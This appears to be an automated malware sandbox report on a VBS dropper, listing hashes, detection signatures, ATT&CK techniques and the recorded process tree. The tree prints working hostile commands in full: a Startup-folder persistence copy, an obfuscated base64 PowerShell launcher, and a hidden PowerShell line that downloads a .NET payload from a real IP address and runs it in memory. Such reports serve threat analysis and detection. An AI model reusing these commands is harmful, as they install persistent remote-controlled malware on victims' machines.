2a196da9c5e2dcf30d7eb90464a4296bc1f0046958836157c07ab4782e5af108

General

Target

9fb660eca8d9ed1038a8cffc032e59bb.vbs
Size

151KB
MD5

9fb660eca8d9ed1038a8cffc032e59bb
SHA1

4aff5b55b1b499cec665f46b132856a4a300b4e9
SHA256

2a196da9c5e2dcf30d7eb90464a4296bc1f0046958836157c07ab4782e5af108
SHA512

0bcb0de54a3bdbe9d0e2be1899ab05060a7db58ae6e53aeed82a54b99f126502e0366415e590f22909aa9531c272af8287c6d5f06ece31de21156bcc2ef81790

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1496 powershell.exe

flow	pid	process
4	1496	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

332 PING.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

568 powershell.exe
1968 powershell.exe
1496 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 568 powershell.exe
Token: SeDebugPrivilege 1968 powershell.exe
Token: SeDebugPrivilege 1496 powershell.exe

pid	process
332	PING.EXE

pid	process
568	powershell.exe
1968	powershell.exe
1496	powershell.exe

description	pid	process
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.execmd.exepowershell.exe

description	pid	process	target process
PID 1504 wrote to memory of 524	1504	WScript.exe	cmd.exe
PID 1504 wrote to memory of 524	1504	WScript.exe	cmd.exe
PID 1504 wrote to memory of 524	1504	WScript.exe	cmd.exe
PID 524 wrote to memory of 332	524	cmd.exe	PING.EXE
PID 524 wrote to memory of 332	524	cmd.exe	PING.EXE
PID 524 wrote to memory of 332	524	cmd.exe	PING.EXE
PID 524 wrote to memory of 568	524	cmd.exe	powershell.exe
PID 524 wrote to memory of 568	524	cmd.exe	powershell.exe
PID 524 wrote to memory of 568	524	cmd.exe	powershell.exe
PID 1504 wrote to memory of 1968	1504	WScript.exe	powershell.exe
PID 1504 wrote to memory of 1968	1504	WScript.exe	powershell.exe
PID 1504 wrote to memory of 1968	1504	WScript.exe	powershell.exe
PID 1968 wrote to memory of 1496	1968	powershell.exe	powershell.exe
PID 1968 wrote to memory of 1496	1968	powershell.exe	powershell.exe
PID 1968 wrote to memory of 1496	1968	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:524

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
21fc3f30c4e1e78013cf6c0403858288

SHA1
be779f55b3b96779fb4915b0698d41598899b806

SHA256
727aee107c80c16855b27fb3b43663370849386e4a1b07694b59e35e821bf3f3

SHA512
aac330b71c8adf338d5ba74390b953649e5bf5aa6cfb41f9076e3f28223a7d2162fcd2c8d7abe406edd25e148faf5f7a830d8da643f001f9c083494389c4d800

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
21fc3f30c4e1e78013cf6c0403858288

SHA1
be779f55b3b96779fb4915b0698d41598899b806

SHA256
727aee107c80c16855b27fb3b43663370849386e4a1b07694b59e35e821bf3f3

SHA512
aac330b71c8adf338d5ba74390b953649e5bf5aa6cfb41f9076e3f28223a7d2162fcd2c8d7abe406edd25e148faf5f7a830d8da643f001f9c083494389c4d800

Download Submit
memory/332-56-0x0000000000000000-mapping.dmp

Download
memory/524-55-0x0000000000000000-mapping.dmp

Download
memory/568-61-0x0000000002702000-0x0000000002704000-memory.dmp

Filesize
8KB

Download
memory/568-59-0x000007FEF2660000-0x000007FEF31BD000-memory.dmp

Filesize
11.4MB

Download
memory/568-63-0x000000000270B000-0x000000000272A000-memory.dmp

Filesize
124KB

Download
memory/568-62-0x0000000002704000-0x0000000002707000-memory.dmp

Filesize
12KB

Download
memory/568-57-0x0000000000000000-mapping.dmp

Download
memory/568-60-0x0000000002700000-0x0000000002702000-memory.dmp

Filesize
8KB

Download
memory/1496-79-0x000000001B780000-0x000000001BA7F000-memory.dmp

Filesize
3.0MB

Download
memory/1496-80-0x000000000286B000-0x000000000288A000-memory.dmp

Filesize
124KB

Download
memory/1496-78-0x0000000002864000-0x0000000002867000-memory.dmp

Filesize
12KB

Download
memory/1496-76-0x0000000002860000-0x0000000002862000-memory.dmp

Filesize
8KB

Download
memory/1496-71-0x0000000000000000-mapping.dmp

Download
memory/1496-77-0x0000000002862000-0x0000000002864000-memory.dmp

Filesize
8KB

Download
memory/1496-74-0x000007FEF1CC0000-0x000007FEF281D000-memory.dmp

Filesize
11.4MB

Download
memory/1504-54-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

Filesize
8KB

Download
memory/1968-69-0x0000000002712000-0x0000000002714000-memory.dmp

Filesize
8KB

Download
memory/1968-75-0x000000000271B000-0x000000000273A000-memory.dmp

Filesize
124KB

Download
memory/1968-70-0x0000000002714000-0x0000000002717000-memory.dmp

Filesize
12KB

Download
memory/1968-68-0x0000000002710000-0x0000000002712000-memory.dmp

Filesize
8KB

Download
memory/1968-67-0x000007FEF1CC0000-0x000007FEF281D000-memory.dmp

Filesize
11.4MB

Download
memory/1968-64-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing